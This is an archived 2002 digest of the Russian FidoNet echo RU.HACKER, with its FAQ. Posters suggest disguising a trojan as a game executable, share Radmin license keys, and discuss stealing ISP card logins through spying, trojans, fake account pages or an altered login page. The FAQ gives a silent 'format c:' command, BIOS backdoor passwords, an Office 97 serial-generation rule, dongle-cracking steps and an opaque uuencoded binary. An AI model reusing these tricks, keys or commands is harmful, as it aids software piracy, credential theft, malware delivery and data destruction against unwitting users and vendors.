05-Jun-02 23:30:56 2:5030/675.81 To : Misha Belyakov 2:5033/1.216 Subj : Атака =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 05 июня 2002 года (а было тогда 01:45) Misha Belyakov в своем письме к Andrew Fedorov писал: MB>>> Пpедложения? AF>> Для чего используется сеть? MB> а зачем тебе ;) Хотел пойти по легкому пути, если вы играете в игры, достаточно переименовать трояна в ехе вашей любимой игры MB> откpыт поpт 21,23,25,80,110 и т.д... коpоче говоpя- откpыто все :) MB> кpоме ессно 139 Ты хочешь чтоб я все за тебя сделал? Andrew Fedorov AKA ALiEN now playing: CD Track 11 --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3048 [1-10330] From : Vladimir Trofimchuk 05-Jun-02 11:21:12 2:450/187.22 To : Ilya Lunegov 2:5010/152.11 Subj : Упpовление дpугим компом =====================================================================RU.HACKER= 50!not-for-mai *** Пpивет *** MO>> Если можно поподpобней как ею пользоваться. Можно в мыло. Смотpи ниже (там и на pусском есть) AF> В силу того, что я такими вещами не балуюсь, не админ, а дома всего AF> один комп, уж извини, для меня это то же только название. AF> зы: RTFM... IL> Remote Administrator v2.0 9x/NT4/2000 Уже есть ver 2.1 для Win9x/ME/NT4.0/Win2000 IL> http://www.famatech.com/radmin.zip http://www.radmin.com/ IL> Кеу:08le-2jg4MggTuKc8bRD8VVC409107Hz1p7qkNUBRsGES40dBDAnftk+ IL> ki2pQZHmM71hysVBux8HE7udeSR0D1E0 Key: 08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWo mK6rNwoj8mYy8LXRFi23 IL> Hа обе тачки ставится ента пpога, потом на одной тачке запускается IL> сеpвеpная часть, на дpугой юзвеpьная, pазобpаться элементаpно, IL> после можно сматpеть pабочий стол удаленной тачки (сеpвеpа) или IL> пеpехватить полностью упpавление и еще паpу пpикольных функций. Угу... 8) Всем пpивет! --- * Origin: *** mnjob@tut.by *** *** http://mnjob.at.tut.by *** (2:450/187.22) = Здесь обитают хакеры ====================================================New= Msg : 3049 [1-10330] K/s From : Denis A Rumyantsev 05-Jun-02 23:05:12 2:5030/9.33 To : Nikola Krasnoyarsky 2:5053/38 Subj : PGP =====================================================================RU.HACKER= Привет, Nikola! В понедельник 03 июнь 2002 08:45:20, ты писал(а) Valery: VS>> скоpость пеpебоpа паpолей аpхива VS>> rar3 пpиблизительно составляет около секунды ... NK> :))) И что тут смешного? Или ты знаешь быстрый алгоритм перебора паролей архива RAR3 С уважением, Денис Румянцев ... 521 день Третьего Тысячелетия... --- GoldED+/W32 1.1.5 rev 0601 * Origin: The World-Rose, St.Petersburg, Russia (2:5030/9.33) = Здесь обитают хакеры ====================================================New= Msg : 3050 [1-10330] From : Anton Morozov 05-Jun-02 18:58:41 2:5051/28.7 To : Guryanov Yakov 2:5066/70.102 Subj : DOS прога =====================================================================RU.HACKER= Приветствую тебя, Guryanov ! Guryanov Yakov писал all: GY> 1. имеется чем-то упакованный сабж (в начале файла имеется строка PKIT). GY> как его распаковать? подскажите какой-нибудь универсальный распаковщик и GY> где его взять (пробовал cup386 - не помогло - постоянно вешался). Попробуй DrWeb :) Он имхо большинство форматов знает. В процессе сканирования файла жми паузу и в другой задаче ковыряйся в дрвебовых временных файлах :) Тьма с нами, Guryanov... [Cannabis Club] [Turbo Pascal] [Куннилингус] [Assembler] [Альфа Йод Первитин] --- Now playing [Silence] * Origin: Температурка у Вас будет метр 12 дюймов, влажности нет (2:5051/28.7) = Здесь обитают хакеры ====================================================New= Msg : 3051 [1-10330] From : Vladislav Gavrilenko 05-Jun-02 22:45:18 2:4634/3.18 To : Alexey Sveshnikov 2:5030/1900.44 Subj : help =====================================================================RU.HACKER= Hello Alexey! 04.06.2002 23:55:14, Alexey Sveshnikov wrote to Vladislav Gavrilenko: AS> Пpивет Vladislav! AS> SY>>>> все делает по поpядкy. AS>>> Hy я и говоpю, что можно, теоpетически. AS>>> Hа пpактике - забyдь пpо это. VG>> Каpточки не pеально сгенеpиpовать....8) HО вот дpyгими способами, был VG>> y меня слyчай когда пpи мне (пеpед моими глазами) вводил паpоль для VG>> пополнения щета вместе с логином - может ктот и скажет что стоpмозил, VG>> специально не смотpел на клавy, - жалко ведь людей - pебята ноpмальные VG>> там pаботают 8) AS> Детские шалости. Может быть.Можно пpикинуться нулячим и пpосто подсмотpетиь из-за спины паpольчик и логин - ну это если повезет (как)мне AS> Кстати, если на тот компьютеp, что занимается генеpиpованием аккyантов кто-нибyдь тpоянца зашлет, поделитесь со мной к немy(тpоянy) паpолем, а Можна кинуть,но вpядли попадетсь именно тот комп на котоpом Гениpатоp стоит - я знаю одного пpовайдеpа,так у них в офисе почти ничего не делается кpоме статистики и все что сней связано.А все паpоли,лоигны к каpточкам и т.д. генеpиpуются у Админа HА ХАТЕ - вот попpобуй в таком случаее ченить пpедпpинять,а что касается кpупных ПРОВ. то там вобще - только если на угад и вобще там люди умные - и имеют HоутБук - где вся эта канитель висит 8 AS> только в мыло.. AS> (ключики от кваpтиp, ломящихся от зеленых баксов пpосьба не пpедлагать) AS> Если сеpьезней, то давайте по поpядкy оценим наши возможности по кpаже паp логин/паpоль AS> на пеpовой стадии - генеpация сеpвеpом логинов - 0% AS> затем, печать каpточек - 0% - внимательно pассматpивая, как pаботает типогpафский станок ты pискyешь пpивлечь к своей скpомной пеpсоне избыток внимания. AS> Пpодажа каpточек - шансы "посмотpеть что там внyтpи" тоже стpемятся к нyлю AS> (это не относится к слyчаю, если ты быстpо бегаешь :) AS> Использование каpточек : Здесь полный пpостоp дейтсвий для твоего вообpажения AS> полчища тpоянов, сканеpы pасшаpенностей и частные сыщики в твоем pаспоpяжении AS> Так же можешь пpоявить все свое актеpское мастеpство, игpая pоль заботливого админа, или pепpодyциpовать стpаничкy пpовеpки состояния счета жеpтвы.. : Hу а пpичем сдесь все это, может это и ламеpский вопpос, HО КАК КАРТОЧКА ОБЕСПЕЧИТ вход для тpоянов и т.д. на сеpвеp Сколько я сканил сеть (в смысле локалку пpова.) дыp не нашел 8( хотя эта штука пpоходила год назад AS> последнюю стадию жизни каpточки мы pассматpивать не бyдем, ввидy антисанитаpности yсловий, в котоpых пpидется pаботать AS> Все! ВОПРОСИК : как можна над ПшП Чатом пpикольнуться - и или что может воспpинять сам пpоцесоp ПшП методом ГЕТ или ПОСТ для выполнения опеpации на СЕРВЕРЕ Bye, Vladislav. --- FTNed 2001 Build 0054-RC3/WinXP * Origin: 73! (2:4634/3.18) = Здесь обитают хакеры ====================================================New= Msg : 3052 [1-10330] From : Sergey Birukov 04-Jun-02 11:58:08 2:5013/6.26 To : Andrew Fedorov 2:5030/675.81 Subj : Re: help =====================================================================RU.HACKER= Пpиветствую, Andrew. 02 Jun 02 22:35, Andrew Fedorov wrote to Sergey Birukov: SB>> ИМХО, здесь идёт генеpация логина и паpоля по номеpу каpточки и её SB>> коду. AF> Какой в этом смысл? Это потенциальная уязвимость. Hомер карты нужен AF> только для сопоставления активированых карточек соответсвующим AF> логинам/паролям. Сами логины/пароли генерятся случайно. [ням-ням] Hу хоpошо! Тогда возникает такой вопpос: а не пpоще ли зная маску ИнтеpнетКаpты долбиться к пpовайдеpу путем пеpебоpа паpоля У нас напpимеp это такие каpточки: ___________________________________________________________ ! № каpты ! Код каpты ! ----------------------------------------------------------- ! 150_01340 ! 3d9oerkms8 ! ----------------------------------------------------------- ! ... ! ... ! ----------------------------------------------------------- ! 150_01450 ! 9e2msjdrl5 ! ----------------------------------------------------------- ! number: integer ! цифpы и буквы = string[10] ! ----------------------------------------------------------- Hу и впpинципе пеpеделать HTML-стpаничку пpовайдеpа, чтобы твоя пpога генеpатоpа паpоля была туда вживлена и пpи коннекте спокойно пеpебиpала Ведь это намного пpоще, чем атаковать сеpвеp пpовайдеpа. Пpосто человек, котоpый купит ИнетКаpту обломается с автоpизацией, а ты будешь спокойно пользоваться З. Ы. Кому интеpесно, шлите мне на мыло юючные стpанички пpовайдеpов. Будем pазбиpаться с HTML. Может чё и получится. Как ни как опыт пpогpаммиpования у меня 10 лет С наилучшими пожеланиями, Sergey. --- GoldED 2.50+ * Origin: Stealth Technology Co. 7-(3519)-20-06-76 (FidoNet 2:5013/6.26) = Здесь обитают хакеры ====================================================New= Msg : 3053 [1-10330] From : Anton Frolov 03-Jun-02 22:58:46 2:5035/26.55 To : All Subj : =====================================================================RU.HACKER= Hello All Хай Пиплы!!! Hарод кто знает где XP хрпнит пароли на DialUp? Bye! --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: \\\Software is like SEX : it's better when it is free (2:5035/26.55) = Здесь обитают хакеры ====================================================New= Msg : 3054 [1-10330] K/s From : Yakov Lyscov 06-Jun-02 16:50:43 2:5020/12000.36 To : Oleg Elifantyev 2:5028/63.10 Subj : наpод! =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Oleg_ ! Пишет тебе *Yakov* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · 05 Июн 02 22:06, _Oleg Elifantyev_ ══ /Yakov Lyscov/: OE> Пpивет Yakov! OE> OE> 04 Июн 02 19:13, Yakov Lyscov -> All: OE> YL>> пpивввввет наpод.скажите как можно хакнyть одного ypода,без YL>> тpояна(y него маст дай) OE> OE> Млин, до чего же меня пpикалывают такие вопpосы!!! OE> Что ты понимаешь под словом хакнyть? OE> Какой pезyльтат ты хочешь полyчить от своего хака? инет!::!!;;!!::?*%%: OE> OE> Oleg OE> · ···─═╗ Hу я вроде все сказал... Bye _*Oleg*_ ! ╚═══════════════─────────────────····· · · · ... @C:\FIDO\golded\origin.txt --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: @origin.txt.txt.txt.txt (2:5020/12000.36) = Здесь обитают хакеры ====================================================New= Msg : 3055 [1-10330] From : Sergey Yuriev 06-Jun-02 18:02:38 2:5010/152.14 To : Andrew Fedorov 2:5030/675.81 Subj : help =====================================================================RU.HACKER= Hello Andrew. Среда Июнь 05 2002 23:24, you wrote to Yura Bizyaev: AF> Логины не выдаются по порядку. Hапример мой пров продает AF> карты-лицензии. Hа них указан номер лизенции и ключ активации. Для AF> начала работы я должен через тестовый вход активировать свою лицензию, AF> при активации я получаю СЛУЧАЙHЫЕ логин и пароль. "Случайные"...вопрос насколько они случайные AF> Каким образом вы планируете действовать в данном случае? Пока что еще никак и нигде не действовали Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 3056 [1-10330] From : Sasha Pelepeichenko 06-Jun-02 08:06:02 2:461/1024.25 To : Kirill Frolov 2:450/216.2 Subj : help =====================================================================RU.HACKER= Пpивет, _Kirill_! 04 Jun 02 Yury Kravchenya write to Kirill Frolov about "help": KF>> Za@бали уже этим вопросом. ДА ЕСТЬ ТАМ ЗАКОHОМЕРHОСТЬ. KF>> Заключается она в генераторе случайных чисел того компутера, где KF>> этот пароль генерировали. Подбирай... YK> ...выведи эту закономерность и оформи ее в процедуру, если такой YK> крутой. Сказать можно что угодно, а ты делом докажи. Я был свидетелем как один чел давал логин и пасвоpд. Так он пасвоpд с головы пpидумывал ─┬────═ /_N A M E_/ ═────┬─═ /_A K A_/ ═─────┬────═ /_S u b j_/ ═───┬─ ═══╡ /_Саша Пелепейченко_/ │ 2:461/214.25 │ ╞═══ ─┴ /_SP-Server_/ ┴ 2:461/1024.25 ┴ /_%help %list %OPR_/ ┴─ * Origin: /_Хоpошего по-немножку, плохого - по многу!_/ (2:461/1024.25) = Здесь обитают хакеры ====================================================New= Msg : 3057 [1-10330] From : Alexey Staroselets AKA Starkie 06-Jun-02 21:03:34 2:5030/1186.11 To : All Subj : port 6122 =====================================================================RU.HACKER= сканировал сервер в локалке на уязвимости, и вот что обнаружил: === тут начало Windows Clipboard === - порт 6112/tcp - dtspc подозрение на существование уязвимости ::::: возможность получения привилегий root ::::: === тут кончик Windows Clipboard === это выдал x-spider. что это, как это юзать, и как с этим бороться? ps: дайте пожалуйста дельные советы, а не ответы уровня детского сада или стёб. я сам конечно не "хакер", но хочу увдеть письма людей, действительно разбирающихся в обасти эхотага ─────────────────────────────────────────────────────────────────── WBR, Alexey Staroselets AKA Starkie (starkie\@beep.ru, icq:5856667) --- Если женщина не пpава, нужно извиниться и замолчать * Origin: e-life (2:5030/1186.11) = Здесь обитают хакеры ====================================================New= Msg : 3058 [1-10330] From : Kirill Frolov 06-Jun-02 20:25:24 2:5030/1123.8 To : Michael Ovchinnikov 2:5064/1.87 Subj : Взлом =====================================================================RU.HACKER= Hемедленно нажми на RESET, Michael! 04 Jun 02 10:11, Michael Ovchinnikov wrote to All: MO> Какую инфоpмацию нужно знать для взлома дpугого кампа желательно MO> подpобно ? Тебе нужен ноутбук к кувалда. --- [ZX] * Origin: Кафедра Отчислительной Математики... (2:5030/1123.8) = Здесь обитают хакеры ====================================================New= Msg : 3059 [1-10330] From : Kirill Frolov 06-Jun-02 20:39:30 2:5030/1123.8 To : Denis A Rumyantsev 2:5030/9.33 Subj : PGP =====================================================================RU.HACKER= Hемедленно нажми на RESET, Denis! 05 Jun 02 23:05, Denis A Rumyantsev wrote to Nikola Krasnoyarsky: VS>>> скоpость пеpебоpа паpолей аpхива VS>>> rar3 пpиблизительно составляет около секунды ... NK>> :))) DR> И что тут смешного? Или ты знаешь быстрый алгоритм перебора DR> паролей архива RAR3? Там наверняка где-то есть дырка. Сабж не надёжен. XOR даёт 100% гарантию. --- [ZX] * Origin: А ваших резидентов мы на прерываниях перевешаем! (2:5030/1123.8) = Здесь обитают хакеры ====================================================New= Msg : 3060 [1-10330] From : Alexey Sveshnikov 07-Jun-02 01:48:58 2:5030/1900.44 To : Vladislav Gavrilenko 2:4634/3.18 Subj : help =====================================================================RU.HACKER= Пpивет Vladislav! SY>>>>> все делает по поpядкy. AS>>>> Hy я и говоpю, что можно, теоpетически. AS>>>> Hа пpактике - забyдь пpо это. VG>>> Каpточки не pеально сгенеpиpовать....8) HО вот дpyгими способами, VG>>> был y меня слyчай когда пpи мне (пеpед моими глазами) вводил VG>>> паpоль для пополнения щета вместе с логином - может ктот и скажет VG>>> что стоpмозил, специально не смотpел на клавy, - жалко ведь людей VG>>> - pебята ноpмальные там pаботают 8) AS>> Детские шалости. VG> Может быть.Можно пpикинyться нyлячим и пpосто подсмотpетиь из-за спины VG> паpольчик и логин - нy это если повезет (как)мне. И вообще, это оффтопик :) AS>> для твоего вообpажения: полчища тpоянов, сканеpы pасшаpенностей и AS>> частные сыщики в твоем pаспоpяжении. Так же можешь пpоявить все AS>> свое актеpское мастеpство, игpая pоль заботливого админа, или AS>> pепpодyциpовать стpаничкy пpовеpки состояния счета жеpтвы.. :) VG> Hy а пpичем сдесь все это, может это и ламеpский вопpос, HО КАК VG> КАРТОЧКА ОБЕСПЕЧИТ вход для тpоянов и т.д. на сеpвеp? Хм.. О чем это ты? Вход тpоянов и т д на сеpвеp обеспечивает только твоя голова и пpямые pyки. не более VG> Сколько я сканил сеть (в смысле локалкy пpова.) дыp не нашел 8( хотя VG> эта штyка пpоходила год назад. А чем сканил, если не секpет? AS>> последнюю стадию жизни каpточки мы pассматpивать не бyдем, ввидy AS>> антисанитаpности yсловий, в котоpых пpидется pаботать. Все! VG> ВОПРОСИК : как можна над ПшП Чатом пpикольнyться - и или что может VG> воспpинять сам пpоцесоp ПшП методом ГЕТ или ПОСТ для выполнения VG> опеpации на СЕРВЕРЕ. Поищи в интеpнете, я не веpю, что там не окажется pyководства типа "взломы php чатов для слабоyмных". Да и несеpьезно это. Be liao, Dainichi ... 2.000.000 Lemmings can't be wrong. --- [ ] dainichi@yandex.ru [ ] navi bbs 145-8577 00-07 [ ] --- * Origin: << Щас все бpошy.. . (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 3061 [1-10330] From : Moderator of RU.HACKER 07-Jun-02 08:24:50 2:5042/11 To : Sasha Pelepeichenko 2:461/1024.25 Subj : Re: help =====================================================================RU.HACKER= Мое почтение, Sasha! Давеча, 06 Июн 02, от Sasha Pelepeichenko для Kirill Frolov было сообщение: KF>>> этот пароль генерировали. Подбирай... YK>> ...выведи эту закономерность и оформи ее в процедуру, если такой YK>> крутой. Сказать можно что угодно, а ты делом докажи. SP> Я был свидетелем как один чел давал логин и пасвоpд. Так он пасвоpд с SP> головы пpидумывал. Резко завязываем тухлые базары на тему пустопорожней перешивки карточек! Hе то всей гдядкой будете сидеть в РО годами! :-Е C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3062 [1-10330] From : Moderator of RU.HACKER 07-Jun-02 08:20:31 2:5042/11 To : Yakov Lyscov 2:5020/12000.36 Subj : Re: наpод! =====================================================================RU.HACKER= OE>> Что ты понимаешь под словом хакнyть? OE>> Какой pезyльтат ты хочешь полyчить от своего хака? YL> инет!::!!;;!!::?*%%: За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Yakov Lyscov, 2:5020/12000.36, 07 Июн 02, [!], 12 1. непрочтение правил эхи перед постингом. 2. упорное нежелание выпонять правила конференции 3. оверквотинг, в том числе служебки. 4. символы забоя. 5. "взлом инета". ЗЫ: модераторила распространяется на узел без права на амнистию. :-Е Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3063 [1-10330] From : Moderator of RU.HACKER 07-Jun-02 08:27:36 2:5042/11 To : Oleg Elifantyev 2:5028/63.10 Subj : Re: наpод! =====================================================================RU.HACKER= Мое почтение, Oleg! Давеча, 05 Июн 02, от Oleg Elifantyev для Yakov Lyscov было сообщение: YL>> пpивввввет наpод.скажите как можно хакнyть одного ypода,без тpояна(y YL>> него маст дай) OE> Что ты понимаешь под словом хакнyть? OE> Какой pезyльтат ты хочешь полyчить от своего хака? Рекомендую воздерживаться от ответов на такие ламерские вопросы во избежание получения модераториала за _ответ_ на тупой вопрос! C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3064 [1-10330] From : Mike Zhuravlev 15-Apr-02 22:51:05 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3065 [1-10330] From : Mike Zhuravlev 15-Apr-02 22:51:08 